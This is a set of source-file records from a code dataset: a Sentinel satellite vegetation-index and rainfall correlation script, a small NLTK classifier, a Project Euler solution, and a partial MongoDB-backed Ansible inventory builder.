return\n#-----------------------散布図\n# 2つの時系列データから散布図を作成する関数\ndef scatter(df,name1,name2,filename):\n # ここがポイント!\n # scikit-learnの線形回帰モデルのクラスを呼び出す\n clf = linear_model.LinearRegression()\n # 説明変数Xにはname1を割り当てる(numpy配列)\n X=df.loc[:,[name1]].values\n # 説明変数Yにはname2を割り当てる(numpy配列)\n Y=df.loc[:,[name2]].values\n # 
#----------------------- Scatter plot\n# Function that creates a scatter diagram from two data columns\ndef scatter(df,name1,name2,filename):\n    # Key point: call the scikit-learn linear-regression model class\n    clf = linear_model.LinearRegression()\n    # assign the name1 column to the explanatory variable X (numpy array)\n    X=df.loc[:,[name1]].values\n    # assign the name2 column to the variable Y (numpy array)\n    Y=df.loc[:,[name2]].values\n    # Key point: fit the predictive model Y = aX + b\n    clf.fit(X,Y)\n    # Key point: regression coefficient a\n    slope=clf.coef_\n    # Key point: intercept b\n    intercept=clf.intercept_\n    # Key point: coefficient of determination R2 (goodness of fit of the regression line)\n    r2=clf.score(X,Y)\n    # build the string \"y = ax + b (R2=r2)\"\n    equation=\" y = \"+str('{:.1f}'.format(slope[0][0]))+\" x +\"+str('{:.0f}'.format(intercept[0]))+\" (R2=\"+str('{:.2f}'.format(r2))+\")\"\n    print(equation)\n    # compute the correlation coefficient and its significance (p-value)\n    corrcoef, pvalue = stats.pearsonr(np.ravel(X),np.ravel(Y))\n    # size of the scatter diagram\n    plt.figure(figsize=(8, 8))\n    # plot the scatter diagram\n    plt.plot(X, Y, 'o')\n    # Key point: draw the regression line over the scatter diagram\n    plt.plot(X, clf.predict(X))\n    # place the \"y = ax + b (R2=r2)\" string at the top left of the figure\n    plt.text(np.nanmin(X), np.nanmax(Y), equation)\n    # graph title\n    plt.title(\"Scatter diagram:\"+name1+\" and \"+name2)\n    # x-axis label\n    plt.xlabel(name1)\n#    plt.xlim(-1, 1)  # set the x-axis minimum and maximum\n    # y-axis label\n    plt.ylabel(name2)\n#    if os.path.isfile(plotFile):\n#        os.remove(plotFile)  # Opt.: os.system(\"rm \"+strFile)\n    plt.savefig(filename)\n#    plt.ylim(-1, 1)  # set the y-axis minimum and maximum\n    # close the figure\n    plt.close()\n    return corrcoef, pvalue\n\n# Create the output directories if they do not already exist\nmakepath(ndpath)\nmakepath(nwpath)\nmakepath(nspath)\nmakepath(gspath)\nmakepath(outpath)\nmakepath(output)\n\n# Input data (read all scenes at once)\ndata_files = glob.glob(data_path+'*V.tif')\ndata_files.sort()\n\n# Read the shapefile (encoding='SHIFT-JIS' also supports Japanese attribute data)\ndf_shp = gpd.read_file(input_shp,encoding='SHIFT-JIS')\nprint(\"input_shp:\",input_shp)\n\n#---------------------- Initialize the lists used for the graphs\nndvi_mean_list = np.zeros(0)\nndwi_mean_list = np.zeros(0)\nndsi_mean_list = np.zeros(0)\ngsi_mean_list = np.zeros(0)\ndata_title_list = np.zeros(0)\n\n# ---------------------- Image layout settings\nlen_num = len(data_files)\ncol = int(4)\nraw =math.ceil(len_num)  # number of subplot rows\nprint(\"raw:\",raw)\nmy_dpi = 50\nim_col = 148 * (col*2*9)\nim_raw = 384 *(col*1)\n\n\n#fig = plt.figure(figsize=(18, image_len))\n#fig = plt.figure(figsize=(25, 200))\nplt.figure(figsize=(int(im_raw/my_dpi),int(im_col/my_dpi)), dpi = my_dpi)\nplt.clf()\nprint(mpl.matplotlib_fname())\n\nj=0\nnum=1\n#----------- Clip the images\n#for i in range(10):\nfor i in range(len_num):\n    input_raster = data_files[i]\n    output_raster = data_files[i][:-4]+'_clip.tif'\n    print(input_raster)\n    print(output_raster)\n    # gdal.Warp(output_raster, input_raster, format = 'GTiff', cutlineDSName = input_shp, dstNodata = np.nan)\n\n\n#---- read raster data --------\n    src = gdal.Open(output_raster, gdal.GA_ReadOnly)\n    src.RasterXSize  # number of pixels in the horizontal direction\n    src.RasterYSize  # number of pixels in the vertical direction\n    src.RasterCount  # number of bands\n\n    # Blue, green, red, NIR and SWIR (the commonly used bands) correspond to B2, B3, B4, B8 and B12 (or B11), respectively\n    # band_name = ['B2', 'B3', 'B4', 'B8', 'B12']\n    barr = src.GetRasterBand(1).ReadAsArray()  # band 1: blue\n    garr = src.GetRasterBand(2).ReadAsArray()  # band 2: green\n    rarr = src.GetRasterBand(3).ReadAsArray()  # band 3: red\n    narr = src.GetRasterBand(4).ReadAsArray()  # band 8: near-infrared\n    swarr = src.GetRasterBand(5).ReadAsArray()  # band 12: shortwave infrared\n\n#---- get EPSG info ---------\n    proj = int(osr.SpatialReference(wkt=src.GetProjection()).GetAttrValue('AUTHORITY',1))\n#    print('proj_type=',type(proj),'proj=',proj)\n\n#-- Call the calNDVI() etc. functions on the band arrays\n    ndvi = calNDVI(rarr, narr)\n    ndwi = calNDWI(swarr, rarr)\n    ndsi = calNDSI(swarr, narr)\n    gsi = calGSI(barr, garr, rarr)\n\n#---calc ndvi ndwi mean-----\n    ndvi_mean_list, ndvi_mean = dataInfo(ndvi_mean_list, ndvi)\n    ndwi_mean_list, ndwi_mean = dataInfo(ndwi_mean_list, ndwi)\n    ndsi_mean_list, ndsi_mean = dataInfo(ndsi_mean_list, ndsi)\n    gsi_mean_list, gsi_mean = dataInfo(gsi_mean_list, gsi)\n\n#---get image date------\n
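    # Editor's note - an illustrative alternative, not part of the original\n    # script: the fixed slice below assumes one particular file-name layout;\n    # a regex such as\n    #\n    #     m = re.search(r'\\d{8}', os.path.basename(input_raster))\n    #     data_title = m.group(0) if m else 'unknown'\n    #\n    # (this assumes \"import re\" and \"import os\", which the original header\n    # may or may not have) would be more robust to path or prefix changes.\n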
#    data_title = data_files[i][-31:-23]\n    data_title = input_raster[-26:-18]\n    data_title_list = np.append(data_title_list, data_title)\n    print(num,data_title,'ndvi_mean=',ndvi_mean,'ndwi_mean=',ndwi_mean,'ndsi_mean=',ndsi_mean,'gsi_mean=',gsi_mean)\n\n#-- Output NDVI data----\n    outputGeotifSingle(src,proj,ndvi,ndpath+filename+'_'+data_title+'_ndvi.tif')\n    outputGeotifSingle(src,proj,ndwi,nwpath+filename+'_'+data_title+'_ndwi.tif')\n    outputGeotifSingle(src,proj,ndsi,nspath+filename+'_'+data_title+'_ndsi.tif')\n    outputGeotifSingle(src,proj,gsi,gspath+filename+'_'+data_title+'_gsi.tif')\n\n#---Draw Images ---\n    num+=1\n    print(\"num:\",num)\n    # colormap reference: https://matplotlib.org/tutorials/colors/colormaps.html\n    j+=1\n    plt.subplot(raw,col,j);plt.imshow( ndvi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n    plt.colorbar()\n    plt.xlabel(data_title+'_ndvi', fontsize=30)  # name the panel via its x-axis label\n    j+=1\n    plt.subplot(raw,col,j);plt.imshow( ndwi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n    plt.colorbar()\n    plt.xlabel(data_title+'_ndwi', fontsize=30)\n    j+=1\n    plt.subplot(raw,col,j);plt.imshow( ndsi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n    plt.colorbar()\n    plt.xlabel(data_title+'_ndsi', fontsize=30)\n    j+=1\n    plt.subplot(raw,col,j);plt.imshow( gsi, clim=(-1, 1), cmap=cm.jet, interpolation='nearest')\n    plt.colorbar()\n    plt.xlabel(data_title+'_gsi', fontsize=30)\n    plt.tight_layout()\n\n##---- Save the figure\n#plt.show()\nplt.ioff()\nif os.path.isfile(strFile):\n    os.remove(strFile)  # Opt.: os.system(\"rm \"+strFile)\nplt.savefig(strFile, dpi=my_dpi)\nplt.cla()\n#plt.tight_layout()\n#plt.show()\n\n#----------------------------------------------------\n# Read the weather data; from here on, build the graphs and csv files and compute the correlation coefficients.\n# Window lengths in days for the moving precipitation totals\ninterval3 =3\ninterval4 =4\ninterval5 =5\ninterval6 =6\ninterval7 =7\ninterval30 =30\n\n# Read the weather data and rename the header\nskipline1=5\ndf = readamedas(direct+in_file,skipline1)\n# Drop the dummy1 and dummy2 columns from the DataFrame (amedas).\ndf=df.drop(['dummy1','dummy2'],axis=1)\nprint(\"df\",df)\n\n# Column-name parameters\ndate_time = \"Date\"\nprec = \"Prec\"\nprec3 = \"Prec_3days\"\nprec4 = \"Prec_4days\"\nprec5 = \"Prec_5days\"\nprec6 = \"Prec_6days\"\nprec7 = \"Prec_7days\"\nprec30 = \"Prec_30days\"\nname_NDVI = \"NDVI\"\nname_NDWI = \"NDWI\"\nname_NDSI = \"NDSI\"\nname_GSI = \"GSI\"\n\n# Convert the dates to datetime and the precipitation values to float.\n#df['年月日'] = pd.to_datetime(df['年月日'])\n#df['年月日'] = pd.Series(df['年月日'].dt.strftime('%Y%m%d'), dtype='str')\ndf[prec] = pd.Series(df[prec], dtype='float')  # convert to float\n# Add moving totals of the daily precipitation (akin to a moving average)\ndf_sum3 = df[prec].rolling(window=interval3).sum()\ndf_sum4 = df[prec].rolling(window=interval4).sum()\ndf_sum5 = df[prec].rolling(window=interval5).sum()\ndf_sum6 = df[prec].rolling(window=interval6).sum()\ndf_sum7 = df[prec].rolling(window=interval7).sum()\ndf_sum30 = df[prec].rolling(window=interval30).sum()\n## Join the moving-total series back onto df\ndf[prec3] = df_sum3\ndf[prec4] = df_sum4\ndf[prec5] = df_sum5\ndf[prec6] = df_sum6\ndf[prec7] = df_sum7\ndf[prec30] = df_sum30\n
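\n# Editor's note - an equivalent, more compact way to build the moving totals\n# above (illustrative only, not part of the original script):\n#\n#     for n in (3, 4, 5, 6, 7, 30):\n#         df['Prec_%ddays' % n] = df['Prec'].rolling(window=n).sum()\n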
\n#--- Collect the computed NDVI etc. results into a pandas DataFrame\nct_csv = np.array([data_title_list, ndvi_mean_list, ndwi_mean_list, ndsi_mean_list, gsi_mean_list]).T  # transpose the matrix\nvi_data = pd.DataFrame(ct_csv,columns =[date_time, name_NDVI ,name_NDWI, name_NDSI,name_GSI])  # add the header row\n#print(\"vidata\",vi_data)\n# Convert the dates to datetime.\nvi_data[date_time] = pd.to_datetime(vi_data[date_time])\n#vi_data = vi_data.set_index([date_time])  # set the index key\n# Convert the ndvi etc. columns to float as well.\nvi_data[name_NDVI] = pd.Series(vi_data[name_NDVI], dtype='float')  # convert to float\nvi_data[name_NDWI] = pd.Series(vi_data[name_NDWI], dtype='float')  # convert to float\nvi_data[name_NDSI] = pd.Series(vi_data[name_NDSI], dtype='float')  # convert to float\nvi_data[name_GSI] = pd.Series(vi_data[name_GSI], dtype='float')  # convert to float\n\n# Keep only the dates present in both frames  https://reffect.co.jp/python/python-pandas-not-duplicate-in-two-excels\ndf_merge = pd.merge(df,vi_data,on=date_time,how=\"inner\",indicator=True)  # how=outer would leave NaNs.\n#df_merge = pd.merge(df, vi_data, how=\"inner\",left_index=True, right_index=True)  # how=outer would leave NaNs.\n'''\nWith left_index=True the index of the left DataFrame is used as the join key;\nwith right_index=True the index of the right DataFrame is used as the join key.\n'''\ndf_clip = df_merge.dropna(how='any')  # drop any row containing a NaN (https://note.nkmk.me/python-pandas-nan-dropna-fillna/)\ndf_clip[date_time] = pd.Series(df_clip[date_time].dt.strftime('%Y%m%d'), dtype='int')  # change the datetime format\n#df_clip[date_time] = pd.Series(df_clip[date_time].dt.strftime('%Y%m%d'), dtype='str')  # change the datetime format\n#df_clip = df_clip.set_index([date_time])  # set the index key\nprint(df_clip)\n\n# Create a scatter diagram from the processed data and save it as a figure.\n#corrcoef, pvalue = scatter(df_clip,name_NDWI,name_NDVI,plotFile)\ncorrcoef, pvalue = scatter(df_clip,name_NDVI,prec5,plotFile)\nprint(\"Prec_NDVI... Corr=\",corrcoef,\"(p-value=\",pvalue,\")\")\n# Create a time-series figure from the processed data.\n# file name: precviFile\ntimeseries(df_clip,date_time,name_NDVI,prec5,precviFile)\n\n\n# Compute summary statistics and save them as csv.\ndf_clip_desc = df_clip.describe()\n#print(df_clip.describe())\nif os.path.isfile(desc_file):\n    os.remove(desc_file)  # Opt.: os.system(\"rm \"+strFile)\ndf_clip_desc.to_csv(desc_file, encoding=\"Shift_JIS\", date_format='%Y%m%d')\n\n# Save the merged data as csv.\nif os.path.isfile(merge_file):\n    os.remove(merge_file)  # Opt.: os.system(\"rm \"+strFile)\ndf_clip.to_csv(merge_file, encoding=\"Shift_JIS\", date_format='%Y%m%d')\n\n\n## Compute all the correlation coefficients at once and save them as csv.\n#'pearson': Pearson product-moment correlation coefficient (default)\n#'kendall': Kendall rank correlation coefficient\n#'spearman': Spearman rank correlation coefficient\n# Sorting the table: https://qiita.com/Masahiro_T/items/2f9574c80193f58af7fe\ndf_clip_corr = df_clip.corr(method='pearson')\n#print(df_clip.corr())\nif os.path.isfile(corr_file):\n    os.remove(corr_file)  # Opt.: os.system(\"rm \"+strFile)\ndf_clip_corr.to_csv(corr_file, encoding=\"Shift_JIS\", date_format='%Y%m%d')\n\n\ndate1 = np.array(df_clip[date_time])\nndvi1 = np.array(df_clip[name_NDVI])\nndwi1 = np.array(df_clip[name_NDWI])\nndsi1 = np.array(df_clip[name_NDSI])\ngsi1 = np.array(df_clip[name_GSI])\nnp_prec = np.array(df_clip[prec])\nnp_prec3 = np.array(df_clip[prec3])\nnp_prec4 = np.array(df_clip[prec4])\nnp_prec5 = np.array(df_clip[prec5])\nnp_prec6 = np.array(df_clip[prec6])\nnp_prec7 = np.array(df_clip[prec7])\nnp_prec30 = np.array(df_clip[prec30])\n\n## Draw the graphs\ndfs = pd.DataFrame(df_clip[prec])\nnum_points = dfs.size  # renamed from \"sum\", which shadowed the built-in\nprint(\"number of rows\",num_points)\n\n\n# Plot the precipitation series.\nfig1,ax1 = plt.subplots(figsize=(15,3))\nplt.plot(np_prec, marker='o', label='PREC')\nplt.plot(np_prec3, marker='*', label='PREC3')\nplt.plot(np_prec4, marker='+', label='PREC4')\nplt.plot(np_prec5, marker='.', label='PREC5')\nplt.plot(np_prec6, marker='1', label='PREC6')\nplt.plot(np_prec7, marker='2', label='PREC7')\nplt.plot(np_prec30, marker='3', label='PREC30')\nplt.legend(bbox_to_anchor=(1, 1), loc='upper right', borderaxespad=0, fontsize=10)\n#plt.legend()\nax1.set_xticks(np.arange(0,num_points))  # number of x-axis ticks\nax1.set_xticklabels(date1, fontsize=10, rotation = 25, ha=\"center\")\nplt.tight_layout()\nplt.grid(True)\n#plt.show()\nif os.path.isfile(precFile):\n    os.remove(precFile)  # Opt.: os.system(\"rm \"+strFile)\nplt.savefig(precFile)\nplt.cla()\n
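\n# Editor's note - the four index plots below all follow one pattern; an\n# equivalent loop form (illustrative only, not part of the original) is:\n#\n#     for arr, lbl, mk in [(ndvi1, name_NDVI, '*'), (ndwi1, name_NDWI, '+'),\n#                          (ndsi1, name_NDSI, '.'), (gsi1, name_GSI, '1')]:\n#         plt.plot(arr, marker=mk, label=lbl)\n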
\n# Plot the time-series variation of NDVI and the other indices\nfig2,ax2 = plt.subplots(figsize=(15,3))\n#plt.plot(prep, marker='o', label='PREP')\nplt.plot(ndvi1, marker='*', label=name_NDVI)\nplt.plot(ndwi1, marker='+', label=name_NDWI)\nplt.plot(ndsi1, marker='.', label=name_NDSI)\nplt.plot(gsi1, marker='1', label=name_GSI)\nplt.legend(bbox_to_anchor=(1, 1), loc='upper right', borderaxespad=0, fontsize=10)\n#plt.legend()\nax2.set_xticks(np.arange(0,num_points))  # number of x-axis ticks\nax2.set_xticklabels(date1, fontsize=10,rotation = 25, ha=\"center\")\nax2.set_ylim(-1, 1)  # set the y-axis minimum and maximum\nplt.tight_layout()  # optimize the layout so axis labels are not cut off\nplt.grid(True)\n#plt.show()\nif os.path.isfile(indexFile):\n    os.remove(indexFile)  # Opt.: os.system(\"rm \"+strFile)\nplt.savefig(indexFile)\nplt.cla()\n","sub_path":"modified_sentinel_ndvi.py","file_name":"modified_sentinel_ndvi.py","file_ext":"py","file_size_in_byte":20211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"547163410","text":"__author__ = 'Karthik'\n\nimport nltk\n\ndef read_train_file():\n    _train_file = {}\n\n    f = open(\"E:\\Masters\\HackDFW\\Hackaton-Users_Train.tsv\", \"r\")\n\n    for train in f:\n        userID, label = train.split()\n        _train_file[userID] = label\n\n    return _train_file\n\ndef read_screen_user_file():\n    _user_set = set()\n\n    f = open(\"E:\\Masters\\HackDFW\\Hackaton-Users_Screens.tsv\", \"r\")\n    i = 0\n    for screen_user in f:\n        screen, user = screen_user.split()\n        _user_set.add(user)\n\n    return _user_set\n\ndef features(number):\n    return {'user_id':number[:-3]}\n\nif __name__ == \"__main__\":\n    _output_userIds = set()\n    train_file = read_train_file()\n    featuresets = [(features(n), c) for (n,c) in train_file.items()]\n    #print train_file\n    classifier = nltk.NaiveBayesClassifier.train(featuresets)\n    #print nltk.classify.accuracy(classifier, featuresets[:1000])\n    #print classifier.classify(features('3750857'))\n    #print classifier.show_most_informative_features(5)\n    _user_set = read_screen_user_file()\n    _output_userIds = _user_set - set(train_file.keys())\n    f = open('problem.txt', 'wb')\n    for line in _output_userIds:\n        f.write(str(line)+\"\\t\"+str(classifier.classify(features(line)))+\"\\n\")\n        #print line,classifier.classify(features(line))\n    f.close()\n\n\n\n\n\n\n\n","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"86044206","text":"\"\"\"\nThe sum of the squares of the first ten natural numbers is,\n1^2 + 2^2 + ... + 10^2 = 385\n\nThe square of the sum of the first ten natural numbers is,\n(1 + 2 + ... + 10)^2 = 55^2 = 3025
\n\nHence the difference between the sum of the squares of the first ten\nnatural numbers and the square of the sum is 3025 − 385 = 2640.\n\nFind the difference between the sum of the squares of the\nfirst one hundred natural numbers and the square of the sum.\n\"\"\"\n\nimport time\nstart_time = time.time()\n\ndef consecutiveIntegerSum(start, end):\n    return (start + end) * (end - start + 1) / 2\n\ndef sumOfSquares(start, end):\n    \"\"\"\n    Sum of squares, computed from the middle pair outward:\n\n    a_0 = centerSum (the two middle squares), a_n = a_(n-1) + 4n,\n    and the result is the sum of a_n for n = 0 .. n_terms/2 - 1.\n    \"\"\"\n    #number of terms\n    n = end - start + 1\n    #a0 term, sum of the middle two squares\n    centerSum = (n/2)**2 + ((n/2)+1)**2\n    term = centerSum\n    total = []\n    for i in range(int(n/2)):\n        term += 4*i\n        total.append(term)\n    return int(sum(total))\n\nsquareOfSum = consecutiveIntegerSum(1,100)**2\nsumOfSquare = sumOfSquares(1,100)\n\nprint(int(squareOfSum - sumOfSquare))\n\nprint(\"\\n--- %s seconds ---\" % str(time.time() - start_time))\n","sub_path":"6 - Sum Square Difference.py","file_name":"6 - Sum Square Difference.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"21513673","text":"#!/Users/rlaney/.virtualenvs/het-ansible/bin/python\n\n'''\nThis is the main engine for working with inventory.py\nDynamically collects all devices and attributes from Opmantek's Mongo database\nUpdates/creates/deletes Netbox's devices database with the collected data\nUpdates/creates/deletes Ansible's hosts database with the collected data\nUpdates/creates/deletes Ansible's groups database with the collected data\nLogs everything to ansible_inventory.log in the current directory\n\nReturns:\nNothing\n'''\n\nfrom __future__ import absolute_import, division, print_function\n\ntry:\n    import simplejson as json\nexcept ImportError:\n    import json\n\nimport csv\n#import mytools\n#import os\n#import pprint\nimport re\n#import sys\nimport signal\nimport pymongo  # needed for pymongo.ASCENDING in add_indexes()\nfrom pymongo.mongo_client import MongoClient\nfrom pymongo.collection import Collection, ReturnDocument\nfrom pymongo.database import Database\nfrom collections import OrderedDict\nfrom pprint import pprint\n#import json\nimport logging\n\nFORMAT1='%(asctime)s: %(levelname)s: %(lineno)d: %(message)s'\nFORMAT2='%(asctime)s: %(levelname)s: %(lineno)d: %(message)s \\n \\\n        \\t%(process)d: %(processName)s: %(thread)d: %(threadName)s: %(funcName)s'\n\nlogging.basicConfig(filename='ansible_inventory.log',\n                    format=FORMAT2,\n                    level=logging.INFO)\n\n'''\nDefine the database connections globally\n'''\nlogging.info('Loading mongo connections')\nlocal_uri = 'mongodb://localhost/'\nlocal_con = MongoClient(local_uri)\n# Local Mongo DB and collection nodes for testing\nlocal_nmis = local_con.get_database('nmis')\nlocal_nodes = local_nmis.get_collection('nodes')\n# Local Mongo DB and new collection devices\nlocal_netbox = local_con.get_database('netbox')\nlocal_devices = local_netbox.get_collection('devices')\n# Local Mongo DB and new collections hosts and groups\nlocal_ansible = local_con.get_database('ansible')\nlocal_hosts = local_ansible.get_collection('hosts')\nlocal_groups = local_ansible.get_collection('groups')\n\n\n'''\nThis is the base class for working with all devices/hosts\nConverts the attributes from Opmantek to a readable format\n'''\nclass BaseHost:\n    def __init__(self, name, host, customer=None, group=None, location=None,\n                 sysLocation=None, _id=None, sysName=None, netType=None,\n                 roleType=None, sysObjectName=None, nodeType=None,
\n                 deviceType=None, nodeVendor=None, nodeModel=None,\n                 serialNum=None, uuid=None, active=None, sysDescr=None,\n                 os_info=None, **kwargs):\n\n        if not name or not host:\n            #print('You must have a name and host')\n            logging.warning('You must have a name and host')\n        else:\n            self.name = name\n            self.primary_ip4 = host\n\n        if customer is None:\n            logging.debug('The field tenant_group is UNKNOWN!')\n            self.tenant_group = 'Unknown'\n        else:\n            self.tenant_group = customer\n\n        # Classify device by BU\n        if group is None:\n            logging.debug('The fields tenant and bu are UNKNOWN!')\n            self.tenant = 'Unknown'\n            self.bu = 'Unknown'\n        else:\n            self.tenant = group\n            self.bu = group.split()[0].lower()\n\n        # Classify device by site\n        if location is None:\n            if sysLocation is None:\n                logging.debug('The fields sys_location and site are UNKNOWN!')\n                self.sys_location = 'Unknown'\n                self.site = 'Unknown'\n            else:\n                self.sys_location = sysLocation\n                self.site = sysLocation.lower().replace(' ', '-')\n        else:\n            self.sys_location = sysLocation\n            self.site = location.lower().replace(' ', '-')\n\n        if _id is None:\n            logging.debug('The field device_id is UNKNOWN!')\n            self.device_id = 'Unknown'\n        else:\n            self.device_id = _id\n\n        if sysName is None:\n            logging.debug('The field sys_name is UNKNOWN!')\n            self.sys_name = 'Unknown'\n        else:\n            self.sys_name = sysName\n\n        # Classify device by network type\n        if netType is None:\n            logging.debug('The field net_type is UNKNOWN!')\n            self.net_type = 'Unknown'\n        else:\n            self.net_type = netType.lower()\n\n        # Classify device by network role\n        if roleType is None:\n            logging.debug('The field role_type is UNKNOWN!')\n            self.role_type = 'Unknown'\n        else:\n            self.role_type = roleType.lower()\n\n\n        if sysObjectName is None:\n            logging.debug('The field device_type is UNKNOWN!')\n            self.device_type = 'Unknown'\n        else:\n            self.device_type = sysObjectName\n\n        if nodeType is None:\n            logging.debug('The field node_type is UNKNOWN!')\n            self.node_type = 'Unknown'\n        else:\n            self.node_type = nodeType\n\n        # Classify device by role\n        if deviceType is None:\n            logging.debug('The field device_role is UNKNOWN!')\n            self.device_role = 'Unknown'\n        else:\n            self.device_role = deviceType.lower().replace(' ', '_')\n\n        if nodeVendor is None:\n            logging.debug('The field vendor is UNKNOWN!')\n            self.vendor = 'Unknown'\n        else:\n            self.vendor = nodeVendor\n\n        # Classify device by type\n        if nodeModel is None:\n            logging.debug('The field model is UNKNOWN!')\n            self.model = 'Unknown'\n        else:\n            self.model = nodeModel.lower()\n\n        if serialNum is None:\n            logging.debug('The field serial is UNKNOWN!')\n            self.serial = 'Unknown'\n        else:\n            self.serial = serialNum\n\n        if uuid is None:\n            logging.debug('The field uuid is UNKNOWN!')\n            self.asset_tag = 'Unknown'\n        else:\n            self.asset_tag = uuid\n\n        if active == 'true':\n            self.status = 'Production'\n        else:\n            logging.debug('The field status is NON-PRODUCTION?')\n            self.status = 'Non-Production'\n\n        if sysDescr is None:\n            logging.debug('The field custom_field_values is UNKNOWN!')\n            self.custom_field_values = 'Unknown'\n        else:\n            self.custom_field_values = sysDescr\n\n        # Classify device by platform\n        try:\n            if os_info is None:\n                logging.info('The device {} has no os_info!'.format(self.name))\n                self.os_info = {}\n                self.platform = 'Unknown'\n                self.series = 'Unknown'\n                self.version = 'Unknown'\n            else:\n                # NOTE: the original compared keys with \"is\" (identity) and\n                # read the values as attributes; use == and dict access.\n                for k in os_info.keys():\n                    if k == 'os':\n                        self.platform = os_info['os']\n                    elif k == 'platform':\n                        self.series = os_info['platform'].lower()\n                    elif k == 'version':\n                        self.version = os_info['version']\n                    else:\n                        continue
\n        except AttributeError:\n            logging.info('The device {} has no os_info!'.format(self.name))\n            self.os_info = {}\n            self.platform = 'Unknown'\n            self.series = 'Unknown'\n            self.version = 'Unknown'\n\n\n    def to_netbox(self):\n        '''\n        Performs CRUD operations on Netbox devices collection\n        '''\n        device = {\n            'name' : str(self.name),\n            'primary_ip4' : str(self.primary_ip4),\n            'tenant_group' : str(self.tenant_group),\n            'tenant' : str(self.tenant),\n            'site' : str(self.site),\n            'net_type' : str(self.net_type),\n            'role_type' : str(self.role_type),\n            'device_type' : str(self.device_type),\n            'node_type' : str(self.node_type),\n            'device_role' : str(self.device_role),\n            'vendor' : str(self.vendor),\n            'model' : str(self.model)\n        }\n\n        try:\n            local_devices.insert_one(device)\n            #print('Successfully inserted {}'.format(device['name']))\n            logging.info('Successfully inserted {}'.format(device['name']))\n        except Exception as e:\n            #print('Unable to insert the device {} {}'.format(device['name'], e))\n            #print('Trying to update the device {}'.format(device['name']))\n            logging.info('Unable to insert the device {} {}'.format(device['name'], e))\n            logging.info('Trying to update the device {}'.format(device['name']))\n            try:\n                dev_filter = {'name': self.name}\n                # iterate over key/value pairs; the original iterated the dict\n                # itself, which cannot be unpacked into k, v\n                for k, v in device.items():\n                    dev_update = {'$addToSet': {k : v}}\n                    local_devices.update(dev_filter, dev_update, upsert=True)\n                #print('Successfully updated {}'.format(device['name']))\n                logging.info('Successfully updated {}'.format(device['name']))\n            except Exception as e:\n                # the original referenced an undefined name \"host\" here\n                #print('Unable to update the device {} {}'.format(device['name'], e))\n                logging.info('Unable to update the device {} {}'.format(device['name'], e))\n\n\n    def to_ansible(self):\n        '''\n        Performs CRUD operations on Ansible hosts collection\n        '''\n        device = {\n            'name' : str(self.name),\n            'primary_ip4' : str(self.primary_ip4),\n            'bu' : str(self.bu),\n            'site' : str(self.site),\n            'net_type' : str(self.net_type),\n            'role_type' : str(self.role_type),\n            'platform' : str(self.platform),\n            'series' : str(self.series),\n            'model' : str(self.model)\n        }\n\n        try:\n            local_hosts.insert_one(device)\n            #print('Successfully inserted {}'.format(device['name']))\n            logging.info('Successfully inserted {}'.format(device['name']))\n        except Exception as e:\n            #print('Unable to insert the device {} {}'.format(device['name'], e))\n            #print('Trying to update the device {}'.format(device['name']))\n            logging.info('Unable to insert the device {} {}'.format(device['name'], e))\n            logging.info('Trying to update the device {}'.format(device['name']))\n            try:\n                dev_filter = {'name': self.name}\n                for k, v in device.items():\n                    dev_update = {'$addToSet': {k : v}}\n                    local_hosts.update(dev_filter, dev_update, upsert=True)\n                #print('Successfully updated {}'.format(device['name']))\n                logging.info('Successfully updated {}'.format(device['name']))\n            except Exception as e:\n                #print('Unable to update the device {} {}'.format(device['name'], e))\n                logging.info('Unable to update the device {} {}'.format(device['name'], e))\n\n\ndef get_ansible_group_by_items():\n    '''\n    Get all the items we can group hosts by\n    '''\n    group_by_items = set()\n    for g in local_hosts.find({}, { \"_id\": 0, \"name\": 0, \"primary_ip4\": 0 }):\n        for k in g.keys():\n            group_by_items.add(k)\n    return list(group_by_items)\n\n\ndef get_ansible_group_names(item):\n    '''\n    Get the group names for each item\n    '''\n    group_names = set()\n    for i in local_hosts.find({}, { \"_id\": 0, str(item): 1 }):\n        for v in i.values():\n            group_names.add(v)\n    return list(group_names)\n
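\n# Editor's note - an illustrative way to exercise the grouping helpers in this\n# module (not part of the original script; assumes the ansible.hosts\n# collection has been populated by to_ansible() above):\n#\n#     for item in get_ansible_group_by_items():\n#         for group in get_ansible_group_names(item):\n#             print(item, group, get_devices_by_group(item, group))\n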
\n\ndef get_devices_by_group(item, group):\n    '''\n    Get all the devices by group\n    '''\n    devices = dict()\n    for d in local_hosts.find({ item: group }, { \"_id\": 0, \"name\": 1, \"primary_ip4\": 1 }):\n        for k, v in d.items():\n            if k == \"name\":\n                name = v\n            elif k == \"primary_ip4\":\n                ip = v\n            else:\n                continue\n        devices.update({name : ip})\n    return devices\n\n\ndef create_ansible_groups():\n    '''\n    Performs CRUD operations on Ansible groups collection\n    '''\n    items = list()\n    groups = list()\n    devices = dict()\n    for item in get_ansible_group_by_items():\n        items.append(item)\n        groups.append(get_ansible_group_names(item))\n        for group in get_ansible_group_names(item):\n            # reset the per-group accumulators; the original accumulated\n            # across every group and only wrote out the last result\n            hosts = set()\n            ips = set()\n            host_vars = dict()\n            devices = get_devices_by_group(item, group)\n            for k, v in devices.items():\n                hosts.add(k)\n                ips.add(v)\n                host_vars.update({ k: { 'ansible_hostname': v }})\n            results = { str(group) : {\n                            'hosts': list(hosts),\n                            'vars': {},\n                            'children': []\n                        },\n                        '_meta': {\n                            'hostvars': host_vars\n                        }\n            }\n\n            try:\n                local_groups.insert_one(results)\n                #print('Successfully inserted:\\n{}'.format(results))\n                logging.info('Successfully inserted:\\n{}'.format(results))\n            except Exception as e:\n                #print('Unable to insert the group {} {}'.format(results, e))\n                #print('Trying to update the group {}'.format(results))\n                logging.info('Unable to insert the group {} {}'.format(results, e))\n                logging.info('Trying to update the group {}'.format(results))\n                try:\n                    # the original built an invalid update document from\n                    # non-existent keys; $set the whole group document instead\n                    g_update = {'$set': {str(group): results[str(group)], '_meta': results['_meta']}}\n                    local_groups.update({str(group): {'$exists': True}}, g_update, upsert=True)\n                    #print('Successfully updated:\\n{}'.format(results))\n                    logging.info('Successfully updated:\\n{}'.format(results))\n                except Exception as e:\n                    